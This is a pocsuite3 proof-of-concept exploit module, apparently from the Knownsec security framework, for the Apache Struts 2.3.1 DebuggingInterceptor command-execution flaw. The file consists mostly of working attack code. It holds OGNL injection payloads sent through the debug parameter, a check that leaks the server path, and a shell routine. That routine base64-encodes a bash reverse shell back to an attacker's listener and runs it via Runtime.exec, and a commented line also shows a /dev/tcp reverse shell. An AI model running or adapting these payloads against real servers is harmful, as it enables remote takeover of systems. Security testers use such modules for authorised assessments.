Struts 2.3.1 DebuggingInterceptor 命令执行漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from urllib.parse import quote from requests.exceptions import ReadTimeout import re import base64 class DemoPOC(POCBase): vulID = '0917' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2012-01-08' createDate = '2013-03-26' updateDate = '2013-03-26' references = ['http://www.exploit-db.com/exploits/18329/'] name = 'Struts 2.3.1 DebuggingInterceptor 命令执行漏洞' appPowerLink = 'http://struts.apache.org/' appName = 'struts' appVersion = '2.3.1#' vulType = 'Code Execution' desc = '''struts2(2.1.0 - 2.3.1）应用中配置不当时（以开发模式部署）有代码执行漏洞，攻击者可利用这个漏洞方便地部署webshell''' samples = [] install_requires = [''] def _verify(self): result = {} # 获取绝对路径 req_confirm = "debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=false,%23req%3D%40org.apache.struts2.ServletActionContext@getRequest%28%29,%23rep%3D%40org.apache.struts2.ServletActionContext@getResponse%28%29,%23rep.getWriter%28%29.println%28new%20java.lang.StringBuilder%28%22~~not_exist_in_html~~%22%29.append%28%23req.getRealPath%28%22%2F%22%29%29.append%28%22~3.1415621~%22%29.toString%28%29%29,%23rep.getWriter%28%29.flush()" url_request = self.url + "?" + req_confirm r = requests.get(url_request) page_content = r.text match = re.findall(r'''~~not_exist_in_html~~([c-nC-n]:\\.*?|/\w*?/.*?)~3.1415621''', page_content) if match: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url_request result['VerifyInfo']['Path'] = match[0] return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port()) # cmd = "bash -c 'sh -i >& /dev/tcp/docker.for.mac.localhost/888 0>&1'" cmd = base64.b64encode(cmd.encode()) shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}".replace("SHELL", cmd.decode()) exec_payload = "debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29)" exec_payload = exec_payload.format(cmd=shell) url_request = self.url + "?" + exec_payload requests.get(url_request) register_poc(DemoPOC)